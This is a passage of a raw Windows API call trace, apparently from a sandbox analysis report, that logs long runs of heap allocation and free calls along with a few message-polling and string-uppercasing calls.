dwFlags=0x0, lpMem=0x12eff30 | out: hHeap=0x12c0000) returned 1 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7bc8 | out: hHeap=0x12c0000) returned 1 [0203.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7a18 [0203.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b79d0 [0203.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7be0 [0203.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00c0 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7be0 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b79d0 | out: hHeap=0x12c0000) returned 1 [0203.508] FreeLibrary (hLibModule=0x74650000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0000 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff00 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300270 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7910 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff40 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7958 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7838 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7790 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7820 | out: hHeap=0x12c0000) returned 1 [0203.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b77c0 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b79b8 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b77d8 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7850 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7988 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b76d0 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b78b0 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b78f8 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b79a0 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7808 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b77f0 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7880 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7868 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0203.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b75f8 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7628 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7640 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7610 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7658 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7670 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7490 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b74a8 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7688 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b76b8 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7508 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b73d0 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7400 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7448 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7460 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7520 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b74c0 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b74d8 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7538 | out: hHeap=0x12c0000) returned 1 [0203.510] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b74f0 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7568 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7970 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7580 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7730 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b78c8 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7748 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b78e0 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b76e8 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7760 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b77a8 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7940 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7898 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7718 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7778 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1304e30 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b75b0 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effe0 | out: hHeap=0x12c0000) returned 1 [0203.511] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.511] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effb0 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effc0 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7700 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7b50 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7bb0 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7a18 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7928 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13132c0 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effb0 | out: hHeap=0x12c0000) returned 1 [0203.512] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.512] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300310 [0203.512] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7700 [0203.512] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00b0 [0203.512] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7928 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00b0 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7928 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7700 | out: hHeap=0x12c0000) returned 1 [0203.512] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300310 | out: hHeap=0x12c0000) returned 1 [0203.512] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0203.513] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.513] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0000 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0000 | out: hHeap=0x12c0000) returned 1 [0203.513] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0203.513] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.513] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302300 | out: hHeap=0x12c0000) returned 1 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2d0 | out: hHeap=0x12c0000) returned 1 [0203.513] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65c0 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302680 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffaf0 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65d8 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6680 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300130 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13023e0 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0203.514] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325990 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7070 | out: hHeap=0x12c0000) returned 1 [0203.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0203.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1305e78 | out: hHeap=0x12c0000) returned 1 [0203.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0203.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bffb0 | out: hHeap=0x12c0000) returned 1 [0203.521] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fc8 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fffa0 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300298 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300040 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffff0 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13025a0 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13000b8 | out: hHeap=0x12c0000) returned 1 [0203.565] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0203.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0203.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302220 | out: hHeap=0x12c0000) returned 1 [0203.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0203.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff5f0 | out: hHeap=0x12c0000) returned 1 [0203.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1568fa0 | out: hHeap=0x12c0000) returned 1 [0203.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0203.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6608 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67b8 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65f0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66c8 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6710 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13134e8 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd10 | out: hHeap=0x12c0000) returned 1 [0203.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6698 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6770 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300018 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13021e8 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6878 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13002e8 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0203.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13002c0 | out: hHeap=0x12c0000) returned 1 [0203.573] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13025d8 [0203.573] CharUpperBuffW (in: lpsz="MIVVMSGJPNONEWUB", cchLength=0x10 | out: lpsz="MIVVMSGJPNONEWUB") returned 0x10 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef800 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef7b0 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0203.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef7d0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef8c0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0203.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0203.574] 